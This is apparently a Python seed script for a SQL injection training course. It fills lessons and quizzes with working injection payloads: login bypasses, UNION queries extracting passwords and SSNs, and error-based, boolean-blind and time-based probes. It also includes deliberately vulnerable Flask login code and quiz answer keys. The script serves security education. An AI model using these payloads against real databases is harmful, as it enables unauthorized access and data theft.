"""Seed the database with the SQL Injection course content from modules/."""

import json

from . import db
from .models import Lesson, LessonStep, Module, User


def _j(obj):
    """Shorthand for json.dumps."""
    return json.dumps(obj)


def _opts(*pairs):
    """Build options list from (id, text) pairs."""
    return _j([{"id": p[0], "text": p[1]} for p in pairs])


USERS_TABLE = _j({
    "columns": ["id", "username", "password", "email", "role"],
    "rows": [
        [1, "alice", "s3cur3!", "alice@mail.com", "admin"],
        [2, "bob", "pass123", "bob@mail.com", "user"],
        [3, "charlie", "qwerty", "charlie@mail.com", "user"],
        [4, "diana", "hunter2", "diana@mail.com", "moderator"],
    ],
    "highlight_row": 0,
})

ICONS = {
    1: "database",
    2: "language",
    3: "terminal",
    4: "category",
    5: "bug_report",
    6: "shield",
    7: "emoji_events"
}

DESCRIPTIONS = {
    1: "Write basic SELECT, WHERE, AND/OR queries and understand how string concatenation creates danger.",
    2: "Trace the journey of user input from browser to database and identify the trust boundary.",
    3: "Craft authentication bypass payloads, use OR 1=1, SQL comments, and test injectability.",
    4: "Classify injections into In-Band, Blind, and Out-of-Band. Master UNION-based and Boolean-based techniques.",
    5: "Extract database metadata, enumerate tables via information_schema, and understand second-order injection.",
    6: "Implement parameterized queries, input validation, least privilege, and WAF as defense-in-depth.",
    7: "Analyze real SQL injection breaches (Heartland, Sony, TalkTalk) and prove your mastery in a comprehensive assessment."
}

def seed_database():
    db.drop_all()
    db.create_all()

    # Default user
    demo = User(username="demo", email="demo@bytesec.local")
    demo.set_password("demo123")
    db.session.add(demo)

    # ── MODULE 01: SQL Fundamentals Refresher ──────────────────────────────────
    m1 = Module(order_index=1, title="SQL Fundamentals Refresher", description=DESCRIPTIONS.get(1, ""), icon=ICONS.get(1, "database"), difficulty="Beginner", estimated_minutes=15)
    db.session.add(m1)
    db.session.flush()
    l1_1 = Lesson(module_id=m1.id, order_index=1, title="What is a Database? (Concept)", narrative="**Narrative**: *Imagine a massive spreadsheet with millions of rows — that's essentially a database table. SQL (Structured Query Language) is the language you use to ask it questions.*", code_snippet=None, code_language=None, table_data=USERS_TABLE)
    db.session.add(l1_1)
    db.session.flush()
    l1_2 = Lesson(module_id=m1.id, order_index=2, title="Your First Query", narrative="**Narrative**: *To retrieve data, we use the `SELECT` statement. Let's grab all usernames from the table.*", code_snippet="SELECT username FROM users;", code_language="sql", table_data=USERS_TABLE)
    db.session.add(l1_2)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l1_2.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="What will this query return?\\n```sql\\nSELECT username, role FROM users WHERE role = 'admin';\\n```", options=_opts(("A", "A) All usernames and roles"), ("B", "B) Only `alice | admin`"), ("C", "C) Only `admin`"), ("D", "D) An error")), correct_answer="B) Only `alice | admin`", explanation="*The `WHERE` clause acts as a filter. It checks each row and only returns rows that match the condition. Think of it as an `if` statement for your database.*\\n---", hints=_j([])))
    l1_3 = Lesson(module_id=m1.id, order_index=3, title="Filtering with WHERE", narrative="**Narrative**: *The `WHERE` clause is the gatekeeper. It decides which rows come back. This is also the exact place where SQL injection happens — but we'll get to that later.*", code_snippet="SELECT * FROM users WHERE username = 'bob';", code_language="sql", table_data=USERS_TABLE)
    db.session.add(l1_3)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l1_3.id, order_index=1, kind="fitb", title="FILL IN THE BLANK", prompt="Complete the query to find all users with the role `'moderator'`:\\n```sql\\nSELECT * FROM users WHERE _________;\\n```\\n**Expected Answer**: `role = 'moderator'`\\n**Acceptable variations**: `role='moderator'`, `role = \"moderator\"`", options=_j([]), correct_answer=_j([""]), explanation="*We check the `role` column and compare it to the string `'moderator'`. SQL uses single quotes for string values.*\\n---", hints=_j(["*Which column stores the user type? What value are we looking for?*"])))
    l1_4 = Lesson(module_id=m1.id, order_index=4, title="Combining Conditions: AND & OR", narrative="**Narrative**: *You can chain multiple conditions together.*", code_snippet="-- AND: Both conditions must be true\\nSELECT * FROM users WHERE role = 'user' AND id > 2;\\n\\n-- OR: At least one condition must be true  \\nSELECT * FROM users WHERE role = 'admin' OR role = 'moderator';", code_language="sql", table_data=USERS_TABLE)
    db.session.add(l1_4)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l1_4.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="What does this query return?\\n```sql\\nSELECT username FROM users WHERE role = 'user' OR role = 'admin';\\n```", options=_opts(("A", "A) `alice, bob, charlie`"), ("B", "B) `bob, charlie`"), ("C", "C) `alice`"), ("D", "D) All four users")), correct_answer="\"A\"", explanation="`alice` is admin, `bob` and `charlie` are users. `diana` is moderator, so she's excluded.", hints=_j([])))
    l1_5 = Lesson(module_id=m1.id, order_index=5, title="The Danger of String Concatenation", narrative="**Narrative**: *Here's where things get interesting. Many web applications build SQL queries by gluing strings together. Watch carefully:*\\n*If `user_input` is `bob`, the query becomes:*\\n*Looks fine, right? But what if the user types something... unexpected?*", code_snippet="SELECT * FROM users WHERE username = 'bob'", code_language="sql", table_data=USERS_TABLE)
    db.session.add(l1_5)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l1_5.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="A web app builds queries like this:\\n```python\\nquery = \"SELECT * FROM users WHERE username = '\" + user_input + \"'\"\\n```\\nIf `user_input` is: `bob' OR '1'='1`\\nWhat will the final SQL query look like?", options=_opts(("A", "A) `SELECT * FROM users WHERE username = 'bob' OR '1'='1'`"), ("B", "B) `SELECT * FROM users WHERE username = 'bob OR 1=1'`"), ("C", "C) An error will occur"), ("D", "D) `SELECT * FROM users WHERE username = 'bob'`")), correct_answer="A) `SELECT * FROM users WHERE username = 'bob' OR '1'='1'`", explanation="The single quote in the input *closes* the original string, and the rest becomes part of the SQL logic. `'1'='1'` is always true, so this returns ALL users.", hints=_j([])))
    l1_6 = Lesson(module_id=m1.id, order_index=6, title="Quick-Fire Round", narrative="", code_snippet=None, code_language=None, table_data=USERS_TABLE)
    db.session.add(l1_6)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l1_6.id, order_index=1, kind="dnd", title="DRAG & DROP", prompt="Arrange these SQL fragments to build a valid query that finds all admin users' emails:\\n**Fragments** (shuffled):\\n- `FROM users`\\n- `SELECT email`\\n- `WHERE role = 'admin'`\\n**Correct order**:\\n```sql\\nSELECT email\\nFROM users\\nWHERE role = 'admin'\\n```\\n---\\n## Module 1 Summary\\n| Concept | Key Takeaway |\\n|---------|-------------|\\n| SELECT | Retrieves data from tables |\\n| WHERE | Filters rows based on conditions |\\n| AND / OR | Combines multiple conditions |\\n| String concatenation | Building queries with user input is **dangerous** ⚠️ |\\n**Teaser for Module 02**: *Now you know SQL basics. But how does a web application actually send these queries? And where exactly does user input enter the picture? Let's find out...*", options=_j([]), correct_answer="", explanation="", hints=_j([])))

    # ── MODULE 02: How Web Apps Talk to Databases ──────────────────────────────────
    m2 = Module(order_index=2, title="How Web Apps Talk to Databases", description=DESCRIPTIONS.get(2, ""), icon=ICONS.get(2, "database"), difficulty="Beginner", estimated_minutes=15)
    db.session.add(m2)
    db.session.flush()
    l2_1 = Lesson(module_id=m2.id, order_index=1, title="The Request Journey (Concept + Visual)", narrative="**Narrative**: *When you type your username and password into a login form and click \"Submit\", a chain of events begins. Let's follow that journey.*\\n**Interactive Visual**: Animated flow diagram (student clicks \"Next\" to advance each step)", code_snippet="Step 1: [Browser]  →  User types \"alice\" and \"s3cur3!\" into a login form\\nStep 2: [Network]  →  Browser sends HTTP POST request to server\\nStep 3: [Server]   →  Backend code receives the input\\nStep 4: [Query]    →  Server builds a SQL query using the input\\nStep 5: [Database] →  Database executes the query and returns results\\nStep 6: [Response] →  Server sends \"Login successful!\" back to browser", code_language="", table_data=None)
    db.session.add(l2_1)
    db.session.flush()
    l2_2 = Lesson(module_id=m2.id, order_index=2, title="Inside the Backend Code", narrative="**Narrative**: *Let's peek behind the curtain. Here's what a typical (vulnerable!) login function looks like:*\\n**Highlight**: The f-string on line 7 is glowing red with a ⚠️ icon.", code_snippet="# Flask web application (Python)\\n@app.route('/login', methods=['POST'])\\ndef login():\\n    username = request.form['username']   # Step 1: Get user input\\n    password = request.form['password']   # Step 1: Get user input\\n    \\n    # Step 2: Build SQL query (⚠️ DANGEROUS WAY)\\n    query = f\"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'\"\\n    \\n    # Step 3: Execute query\\n    result = db.execute(query)\\n    \\n    # Step 4: Check result\\n    if result:\\n        return \"Login successful!\"\\n    else:\\n        return \"Invalid credentials.\"", code_language="python", table_data=None)
    db.session.add(l2_2)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l2_2.id, order_index=1, kind="spot", title="SPOT THE VULNERABILITY", prompt="Look at the code above. Which line introduces the security vulnerability? Click on it.\\n```python\\n# Line 1: username = request.form['username']\\n# Line 2: password = request.form['password']\\n# Line 3: query = f\"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'\"\\n# Line 4: result = db.execute(query)\\n# Line 5: if result:\\n```", options=_j([]), correct_answer="Line 3", explanation="*Line 3 directly inserts user input into the SQL string using an f-string. The user input is never validated, sanitized, or parameterized. This means whatever the user types becomes part of the SQL command.*\\n**Common wrong answer — Line 4**: *Line 4 executes the query, but the vulnerability was introduced on Line 3 when the query was built. Executing a safe query is fine — the problem is building an unsafe one.*\\n---", hints=_j([])))
    l2_3 = Lesson(module_id=m2.id, order_index=3, title="The Trust Boundary", narrative="**Narrative**: *There's an invisible line in every application called the **trust boundary**. Everything on the user's side (browser, input fields, URLs) is **untrusted**. Everything should be validated before it crosses into the server side.*", code_snippet="╔══════════════════════════╗    ╔══════════════════════════╗\\n║    🚫 UNTRUSTED ZONE     ║    ║    ✅ TRUSTED ZONE        ║\\n║                          ║    ║                          ║\\n║  • Form inputs           ║    ║  • Validated data        ║\\n║  • URL parameters        ║    ║  • Parameterized queries ║\\n║  • Cookies               ║ →→ ║  • Server-side logic     ║\\n║  • HTTP headers          ║    ║  • Database engine       ║\\n║  • Hidden form fields    ║    ║                          ║\\n╚══════════════════════════╝    ╚══════════════════════════╝\\n         TRUST BOUNDARY →→→", code_language="", table_data=None)
    db.session.add(l2_3)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l2_3.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="A developer hides the user role in a hidden HTML form field:\\n```html\\n<input type=\"hidden\" name=\"role\" value=\"user\">\\n```\\nIs this safe from tampering?", options=_opts(("A", "A) Yes, because the field is hidden from the user"), ("B", "B) Yes, because only the server can set hidden fields"), ("C", "C) No, because anything from the browser can be modified by the user"), ("D", "D) No, but only if the user knows JavaScript")), correct_answer="\"C\"", explanation="Hidden fields are still part of the HTML sent to the browser. Anyone can open DevTools, change `\"user\"` to `\"admin\"`, and submit the form. **Never trust client-side data.**", hints=_j([])))
    l2_4 = Lesson(module_id=m2.id, order_index=4, title="Following the Injection Path", narrative="**Narrative**: *Let's trace exactly what happens when an attacker enters a malicious input into our vulnerable login form.*\\n**Interactive Step-Through** (student clicks to advance):\\n**Normal Login**:\\n**Attack Login**:\\n**Breakdown**:\\n- `'` → Closes the opening quote for username\\n- `OR 1=1` → Makes the WHERE clause always true\\n- `--` → Comments out the rest of the query (password check is ignored!)", code_snippet="Input:  username = ' OR 1=1 --    password = anything\\nQuery:  SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = 'anything'\\nResult: ⚠️ Returns ALL rows → Login successful (as first user!)", code_language="", table_data=None)
    db.session.add(l2_4)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l2_4.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="Given this backend code:\\n```python\\nquery = f\"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'\"\\n```\\nIf the attacker enters:\\n- Username: `admin'--`\\n- Password: `doesntmatter`\\nWhat is the final SQL query?", options=_opts(("A", "A) `SELECT * FROM users WHERE username = 'admin'--' AND password = 'doesntmatter'`"), ("B", "B) `SELECT * FROM users WHERE username = 'admin--' AND password = 'doesntmatter'`"), ("C", "C) `SELECT * FROM users WHERE username = 'admin' AND password = 'doesntmatter'`"), ("D", "D) An error occurs")), correct_answer="A) `SELECT * FROM users WHERE username = 'admin'--' AND password = 'doesntmatter'`", explanation="The `'` closes the username string, and `--` comments out everything after it. The effective query is:", hints=_j([])))
    l2_5 = Lesson(module_id=m2.id, order_index=5, title="Where Can Injection Happen?", narrative="**Narrative**: *SQL injection isn't limited to login forms. Any place where user input touches a SQL query is a potential entry point.*", code_snippet="🔴 Login forms          → username, password fields\\n🔴 Search bars          → search query parameter\\n🔴 URL parameters       → /product?id=5\\n🔴 Cookie values        → session tokens, preferences\\n🔴 HTTP headers         → User-Agent, Referer\\n🔴 File upload names    → filename metadata\\n🔴 API request bodies   → JSON/XML payloads", code_language="", table_data=None)
    db.session.add(l2_5)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l2_5.id, order_index=1, kind="dnd", title="DRAG & DROP (Matching)", prompt="Match each user input source to its injection risk scenario:\\n| Input Source | Scenario |\\n|-------------|----------|\\n| Search bar | `SELECT * FROM products WHERE name LIKE '%____%'` |\\n| URL parameter | `SELECT * FROM products WHERE id = ___` |\\n| Login form | `SELECT * FROM users WHERE username = '___'` |\\n| Cookie | `SELECT * FROM sessions WHERE token = '___'` |\\n**Student drags** input sources to the correct query template.", options=_j([]), correct_answer="Each source maps to the scenario where that type of input would be interpolated into a query.", explanation="", hints=_j([])))
    db.session.add(LessonStep(lesson_id=l2_5.id, order_index=2, kind="mcq", title="MULTIPLE CHOICE", prompt="A web app has this URL for viewing products:\\n```\\nhttps://shop.com/product?id=42\\n```\\nThe backend code is:\\n```python\\nproduct_id = request.args.get('id')\\nquery = f\"SELECT * FROM products WHERE id = {product_id}\"\\n```\\nWhat makes this **especially** dangerous compared to string-based injection?", options=_opts(("A", "A) Numbers can't be injected"), ("B", "B) There are no quotes to escape, so the attacker doesn't need to close any string"), ("C", "C) URL parameters are automatically sanitized"), ("D", "D) GET requests are safer than POST requests")), correct_answer="\"B\"", explanation="Since the id is a number, it's inserted without quotes. The attacker doesn't even need to worry about quote characters. They can simply append SQL:", hints=_j([])))

    # ── MODULE 03: Your First Injection ──────────────────────────────────
    m3 = Module(order_index=3, title="Your First Injection", description=DESCRIPTIONS.get(3, ""), icon=ICONS.get(3, "database"), difficulty="Intermediate", estimated_minutes=20)
    db.session.add(m3)
    db.session.flush()
    l3_1 = Lesson(module_id=m3.id, order_index=1, title="Breaking the String Barrier (Concept)", narrative="**Narrative**: *SQL injection is all about one thing: **escaping the data context**. When you type into a form, the app expects your input to be data — a username, a search term. But if your input contains special SQL characters, it stops being data and starts being **code**.*\\n**Key Concept**: The single quote `'` is the escape character. It breaks you out of the string context.", code_snippet="Normal input:    alice\\n                 ↓\\nQuery becomes:   ... WHERE username = 'alice'\\n                                       ^^^^^ ← stays inside quotes (DATA)\\n\\nMalicious input: alice' OR '1'='1\\n                 ↓\\nQuery becomes:   ... WHERE username = 'alice' OR '1'='1'\\n                                       ^^^^^          ← escapes quotes (CODE!)", code_language="", table_data=None)
    db.session.add(l3_1)
    db.session.flush()
    l3_2 = Lesson(module_id=m3.id, order_index=2, title="The Classic Authentication Bypass", narrative="**Narrative**: *Let's build our first real injection. Here's the target — a simple login form connected to this backend:*\\n*Our goal: Log in as `admin` without knowing the password.*\\n**Step-by-step walkthrough** (student advances each step):\\n**Step 1 — Understand the template**:\\n**Step 2 — Close the username string**:\\n**Step 3 — Add always-true condition**:\\n**Step 4 — Comment out the rest**:\\n✅ **Success!** Password check is completely bypassed.", code_snippet="Input: admin'--\\nQuery: SELECT * FROM users WHERE username = 'admin'--' AND password = '...'\\n                                                   ↑↑ everything after -- is ignored\\nEffective: SELECT * FROM users WHERE username = 'admin'", code_language="", table_data=None)
    db.session.add(l3_2)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l3_2.id, order_index=1, kind="sandbox", title="LIVE SQL SANDBOX", prompt="Log in as `admin` without using the correct password.\\n**Input fields**:\\n- Username: `[_______________]`\\n- Password: `[_______________]`\\n**Live query display**: Shows the constructed query in real-time as the student types.\\n**Accepted answers** (any of these in the username field):\\n```\\nadmin'--\\nadmin' --\\nadmin'--\\n' OR 1=1--\\n' OR '1'='1'--\\nadmin' OR 1=1--\\n```\\n**On success**: 🎉 Animation: \"Access Granted! You're in as admin.\" + Show the effective query and explain why it worked.\\n**On failure**: Show the constructed query and highlight the syntax error or why it didn't return results.\\n---", options=_j([]), correct_answer="", explanation="", hints=_j(["*Remember, `'` closes the string and `--` comments out the rest.*", "*Try typing `admin'--` as the username.*"])))
    l3_3 = Lesson(module_id=m3.id, order_index=3, title="Variations on the Theme", narrative="**Narrative**: *There's more than one way to bypass a login. Let's explore different payloads and understand why each works.*", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l3_3)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l3_3.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="Using the payload `' OR 1=1--` as the username, which user will the attacker log in as?\\n```\\nusers table:\\nid=1  alice (admin)\\nid=2  bob (user)\\nid=3  charlie (user)\\n```", options=_opts(("A", "A) alice (the first row returned)"), ("B", "B) bob"), ("C", "C) charlie"), ("D", "D) All users simultaneously")), correct_answer="\"A\"", explanation="The query `WHERE username = '' OR 1=1` returns ALL rows, but the application typically takes the **first result**. Since `alice` has `id=1`, she's returned first. The attacker logs in as alice (the admin!).", hints=_j([])))
    l3_4 = Lesson(module_id=m3.id, order_index=4, title="Injection Without Comments", narrative="**Narrative**: *Some databases don't support `--` comments, or the app filters them out. Can you still inject? Absolutely.*\\n**The trick**: Instead of commenting out the rest, **complete the query's syntax**.\\nEvery condition has balanced quotes. No comments needed!", code_snippet="Input username: ' OR '1'='1\\nInput password: ' OR '1'='1\\n\\nResult:\\nSELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1'", code_language="", table_data=None)
    db.session.add(l3_4)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l3_4.id, order_index=1, kind="fitb", title="FILL IN THE BLANK", prompt="Complete the injection payload that bypasses login WITHOUT using SQL comments (`--` or `#`):\\nUsername: `' OR '1'='1`\\nPassword: `____________`\\n**Expected Answer**: `' OR '1'='1`", options=_j([]), correct_answer=_j([""]), explanation="*By making both fields use the same trick, you maintain balanced quotes throughout the query. Both conditions become always-true, and no comment syntax is needed.*\\n---", hints=_j([])))
    l3_5 = Lesson(module_id=m3.id, order_index=5, title="Different Comment Styles", narrative="**Narrative**: *Different databases use different comment syntaxes. Knowing which one to use is essential.*\\n⚠️ **MySQL gotcha**: MySQL requires a **space after `--`**. So `admin'--` won't work, but `admin'-- ` will. Alternatively, use `admin'#`.", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l3_5)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l3_5.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="You're attacking a MySQL database. Your payload `admin'--` isn't working. What should you try instead?", options=_opts(("A", "A) `admin'-- ` (add a space after --)"), ("B", "B) `admin'//`"), ("C", "C) `admin'\\n`"), ("D", "D) `admin'**`")), correct_answer="\"A\"", explanation="MySQL requires a space (or other whitespace) after `--` for it to be treated as a comment. Alternatively, `admin'#` would also work since MySQL supports `#` as a comment character.", hints=_j([])))
    l3_6 = Lesson(module_id=m3.id, order_index=6, title="Detecting Injectability", narrative="**Narrative**: *Before crafting a full injection, attackers first test whether a field is injectable. Here are the classic probing techniques:*\\n**Probe 1 — The Single Quote Test**:\\n**Probe 2 — The Boolean Test**:\\n**Probe 3 — The Time-Based Test**:", code_snippet="Input: ' OR SLEEP(5)--\\nIf response takes 5+ seconds → Field is injectable!", code_language="", table_data=None)
    db.session.add(l3_6)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l3_6.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="You enter a single quote `'` into a search field and get this response:\\n```\\nError: You have an error in your SQL syntax; check the manual\\nthat corresponds to your MySQL server version for the right\\nsyntax to use near ''''' at line 1\\n```\\nWhat does this tell you?", options=_opts(("A", "A) The search is broken and needs fixing"), ("B", "B) The application uses MySQL and the search field is vulnerable to SQL injection"), ("C", "C) The application correctly blocked your injection attempt"), ("D", "D) MySQL is not running")), correct_answer="B) The application uses MySQL and the search field is vulnerable to SQL injection", explanation="The error reveals two things: (1) The app uses MySQL (mentioned in the error), and (2) user input is directly embedded in SQL queries (the quote caused a syntax error instead of being safely handled).", hints=_j([])))
    l3_7 = Lesson(module_id=m3.id, order_index=7, title="Sandbox Challenge", narrative="", code_snippet=None, code_language=None, table_data=None)
    db.session.add(l3_7)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l3_7.id, order_index=1, kind="sandbox", title="SANDBOX (Capstone Challenge)", prompt="The `secret_note` column isn't displayed on the page. Craft an injection that makes the search results include the `secret_note` column.\\n1. *The search wraps your input in `%..%`. You need to escape from the LIKE clause first.*\\n2. *Think about UNION SELECT — it lets you combine results from two queries.*\\n3. *Try: `%' UNION SELECT id, name, price, secret_note FROM products--`*\\n**Expected Solution**:\\n```\\nSearch input: %' UNION SELECT id, name, price, secret_note FROM products--\\n```\\n**Resulting query**:\\n```sql\\nSELECT * FROM products WHERE name LIKE '%%' UNION SELECT id, name, price, secret_note FROM products--'\\n```\\n**On success**: Shows the secret_note column data. 🎉 \"You just performed data exfiltration using UNION-based SQL injection!\"\\n---\\n## Module 3 Summary\\n| Concept | Key Takeaway |\\n|---------|-------------|\\n| String escape | `'` breaks out of the data context into code context |\\n| Auth bypass | `admin'--` skips password validation |\\n| OR 1=1 | Always-true condition returns all rows |\\n| Comment syntax | `--`, `#`, `/* */` — varies by database |\\n| Probing | Single quotes and boolean tests detect injectability |\\n| UNION injection | Combine queries to extract hidden data |\\n**Teaser for Module 04**: *You've learned the classic injection. But what if the app doesn't show you any error messages or data? Blind SQL injection techniques let you extract data even when you can't see the results directly...*", options=_j([]), correct_answer="", explanation="", hints=_j([""])))

    # ── MODULE 04: Types of SQL Injection ──────────────────────────────────
    m4 = Module(order_index=4, title="Types of SQL Injection", description=DESCRIPTIONS.get(4, ""), icon=ICONS.get(4, "database"), difficulty="Intermediate", estimated_minutes=25)
    db.session.add(m4)
    db.session.flush()
    l4_1 = Lesson(module_id=m4.id, order_index=1, title="The Three Families (Concept)", narrative="**Narrative**: *Not all SQL injections work the same way. The technique you use depends on what the application **shows you back**. Think of it as three levels of visibility:*\\n**Interactive Visual**: Three doors, student clicks each to reveal details", code_snippet="╔═══════════════════╗  ╔═══════════════════╗  ╔═══════════════════╗\\n║   🔓 IN-BAND      ║  ║   🔒 BLIND         ║  ║   📡 OUT-OF-BAND  ║\\n║                   ║  ║                   ║  ║                   ║\\n║  You can SEE the  ║  ║  You can't see    ║  ║  Data is sent to  ║\\n║  results directly ║  ║  results, but can ║  ║  an external      ║\\n║  on the page.     ║  ║  infer YES/NO.    ║  ║  server you       ║\\n║                   ║  ║                   ║  ║  control.          ║\\n║  • Error-based    ║  ║  • Boolean-based  ║  ║                   ║\\n║  • UNION-based    ║  ║  • Time-based     ║  ║  • DNS exfil      ║\\n║                   ║  ║                   ║  ║  • HTTP exfil      ║\\n╚═══════════════════╝  ╚═══════════════════╝  ╚═══════════════════╝\\n     EASY → → → → → → → MEDIUM → → → → → → → → → ADVANCED", code_language="", table_data=None)
    db.session.add(l4_1)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l4_1.id, order_index=1, kind="mcq", title="MULTIPLE CHOICE", prompt="You inject a single quote `'` into a search field and the page displays:\\n```\\nError: Unterminated string literal at position 42\\n```\\nWhich type of SQL injection is this?", options=_opts(("A", "A) In-Band (Error-based)"), ("B", "B) Blind (Boolean-based)"), ("C", "C) Blind (Time-based)"), ("D", "D) Out-of-Band")), correct_answer="\"A\"", explanation="The application is directly showing you the database error. This is In-Band, Error-based injection. The error message gives you direct feedback about your injection's effect.", hints=_j([])))
    l4_2 = Lesson(module_id=m4.id, order_index=2, title="In-Band: Error-Based Injection", narrative="**Narrative**: *Error-based injection is the attacker's favorite — the application literally tells you what went wrong. You can extract data by intentionally causing errors that include database information.*\\nThe database version is leaked inside the error message!", code_snippet="-- MySQL: EXTRACTVALUE forces an XPath error that includes query results\\n' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT @@version))) --\\n\\n-- Error response:\\n-- XPATH syntax error: '~5.7.34-0ubuntu0.18.04.1'", code_language="sql", table_data=None)
    db.session.add(l4_2)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l4_2.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="An attacker injects this into a vulnerable MySQL field:\\n```sql\\n' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables LIMIT 1))) --\\n```\\nWhat kind of information will appear in the error?", options=_opts(("A", "A) The server's IP address"), ("B", "B) The name of the first table in the database"), ("C", "C) All data from all tables"), ("D", "D) The application's source code")), correct_answer="B) The name of the first table in the database", explanation="`EXTRACTVALUE` forces an error that includes the result of the subquery. `information_schema.tables` contains metadata about all tables. `LIMIT 1` returns just the first table name.", hints=_j([])))
    l4_3 = Lesson(module_id=m4.id, order_index=3, title="In-Band: UNION-Based Injection", narrative="**Narrative**: *UNION injection is the most powerful in-band technique. It lets you **append your own query** to the original, stealing data from any table.*\\n**The Rules of UNION**:\\n1. The number of columns in your query must **match** the original query\\n2. The data types should be **compatible**\\n**Step-by-step approach**:", code_snippet="Step 1: Find the number of columns\\n  ' ORDER BY 1--   ✅ works\\n  ' ORDER BY 2--   ✅ works  \\n  ' ORDER BY 3--   ✅ works\\n  ' ORDER BY 4--   ❌ error! → Original query has 3 columns\\n\\nStep 2: Find which columns are displayed\\n  ' UNION SELECT 'aaa','bbb','ccc'--\\n  → See where 'aaa', 'bbb', 'ccc' appear on the page\\n\\nStep 3: Extract data through visible columns\\n  ' UNION SELECT username, password, email FROM users--", code_language="", table_data=None)
    db.session.add(l4_3)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l4_3.id, order_index=1, kind="sandbox", title="SANDBOX (Guided)", prompt="", options=_j([]), correct_answer="", explanation="", hints=_j([])))
    db.session.add(LessonStep(lesson_id=l4_3.id, order_index=2, kind="build", title="BUILD THE QUERY", prompt="You know a table `employees` has columns `first_name`, `salary`, and `ssn`. The original query has 3 columns. Build a UNION injection to extract all employee SSNs.\\n**Fragments available** (drag to build):\\n```\\n' UNION          SELECT          first_name,          salary,\\nssn              FROM            employees            --\\n```\\n**Correct assembly**:\\n```sql\\n' UNION SELECT first_name, salary, ssn FROM employees--\\n```", options=_j([]), correct_answer="", explanation="*The UNION must have exactly 3 columns to match the original query. We select the three columns we're interested in from the `employees` table.*\\n---", hints=_j([])))
    l4_4 = Lesson(module_id=m4.id, order_index=4, title="Blind: Boolean-Based Injection", narrative="**Narrative**: *What if the application doesn't show errors or query results? You can still extract data by asking the database yes-or-no questions and watching how the page behaves.*\\n**The Concept**: Instead of seeing data directly, you observe:\\n- **TRUE condition** → Page loads normally (e.g., \"Product found\")\\n- **FALSE condition** → Page changes (e.g., \"No results\" or blank page)\\n*Slowly, character by character: `a`, `s`, `e`, `c`, `r`, `e`, `t` → Password is `asecret`*", code_snippet="-- Is the first character of admin's password 'a'?\\n' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin') = 'a' --\\n→ Page loads normally = YES ✅\\n\\n-- Is the second character 'b'?  \\n' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='admin') = 'b' --\\n→ Page is blank = NO ❌\\n\\n-- Is the second character 's'?\\n' AND (SELECT SUBSTRING(password,2,1) FROM users WHERE username='admin') = 's' --\\n→ Page loads normally = YES ✅", code_language="sql", table_data=None)
    db.session.add(l4_4)
    db.session.flush()
    db.session.add(LessonStep(lesson_id=l4_4.id, order_index=1, kind="predict", title="PREDICT THE OUTPUT", prompt="An attacker sends these three requests to a search page:\\n```\\nRequest 1: ' AND 1=1--     → Page shows \"Results found\"\\nRequest 2: ' AND 1=2--     → Page shows \"No results\"\\nRequest 3: ' AND (SELECT LENGTH(password) FROM users WHERE username='admin') = 8-- → Page shows \"Results found\"\\n```\\nWhat has the attacker just learned?", options=_opts(("A", "A) The admin's password is 8 characters long"), ("B", "B) The admin's password is \"12345678\""), ("C", "C) There are 8 users in the database"), ("D", "D) The password column has 8 rows")), correct_answer="A) The admin's password is 8 characters long", explanation="Request 1 & 2 confirm Boolean-based blind injection works (true vs false produces different responses). Request 3 asks \"Is the password length equal to 8?\" and gets a \"true\" response. The admin password is 8 characters long.", hints=_j([])))
    l4_5 = Lesson(module_id=m4.id, order_index=5, title="Blind: Time-Based Injection", narrative="**Narrative**: *Sometimes the page looks **exactly the same** regardless of true or false. No errors, no different content. In this case, we weaponize **time**.*\\n**The Concept**: We ask the database to **sleep** if a condition is true:\\n- **TRUE** → Response takes 5+ seconds\\n- **FALSE** → Response is instant", code_snippet="-- MySQL: Does the admin password start with 'a'?\\n' AND IF(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a', SLEEP(5), 0)--\\n\\n-- If response takes 5 seconds → YES, first character is 'a'\\n-- If response is instant → NO, try next character", code_language="sql", table_data=None)
    db.session.add(l4_5)
    db.session.flush()
